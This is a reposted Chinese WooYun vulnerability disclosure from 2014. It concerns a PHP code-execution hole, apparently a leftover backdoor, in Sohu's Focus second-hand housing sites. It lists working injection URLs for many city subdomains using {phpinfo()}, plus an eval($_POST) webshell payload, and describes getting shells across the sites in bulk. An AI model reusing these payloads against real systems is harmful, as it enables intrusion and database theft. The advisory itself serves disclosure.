[公开漏洞]搜狐(第二季)旗下某站通用型命令执行第五集(批量shell，自带后门)

搜狐(第二季)旗下某站通用型命令执行第五集(批量shell，自带后门) 相关厂商： 搜狐 漏洞作者：浩天 提交时间：2014-06-03 16:10 公开时间：2014-07-18 16:11 漏洞类型：命令执行 危害等级：高 自评Rank：20 漏洞状态： 厂商已经确认 漏洞来源：http://www.wooyun.org Tags标签： webshell 远程命令执行 php代码执行 webshell webshell 漏洞详情 披露状态：

2014-06-03：细节已通知厂商并且等待厂商处理中
2014-06-03：厂商已经确认，细节仅向厂商公开
2014-06-13：细节向核心白帽子及相关领域专家公开
2014-06-23：细节向普通白帽子公开
2014-07-03：细节向实习白帽子公开
2014-07-18：细节向公众公开

简要描述：

之前的案例获取到了大量的mysql信息，一直缺shell，我的漏洞也都到日期公布了，很多白帽子蜂拥而至，抢生意了，都戒撸了，看来我是剁手党吖

详细说明：

不同的服务器名：批量shell的感觉不一样吖

http://sz.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://gz.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://cd.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://bj.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://sh.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://hz.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://tj.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://cq.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://sjz.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://nj.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://sy.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

http://puyang.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale

......还有很多，跟之前的sql注一样，替换地区域名即可实现批量shell

漏洞证明：

没传shell，自带后门，呵呵

http://sz.esf.focus.cn/ajax/get_house_map_mark.json.php?config={eval($_POST[c])}&type=sale

数据库配置信息泄露一地吖，不读了，有shell，其实很开心

,漫不漫游的就这么回事吧

修复方案：

原始开发人员自留的后门？？

版权声明：转载请注明来源 浩天@乌云

漏洞回应 厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-06-03 16:42

厂商回复：

感谢对搜狐安全关注

最新状态：

暂无

0

版权与免责声明：

凡注明稿件来源的内容均为转载稿或由网友用户注册发布，本网转载出于传递更多信息的目的；如转载稿涉及版权问题，请作者联系我们，同时对于用户评论等信息，本网并不意味着赞同其观点或证实其内容的真实性；

本文地址：https://top.cnzzla.com/artinfo/2540.html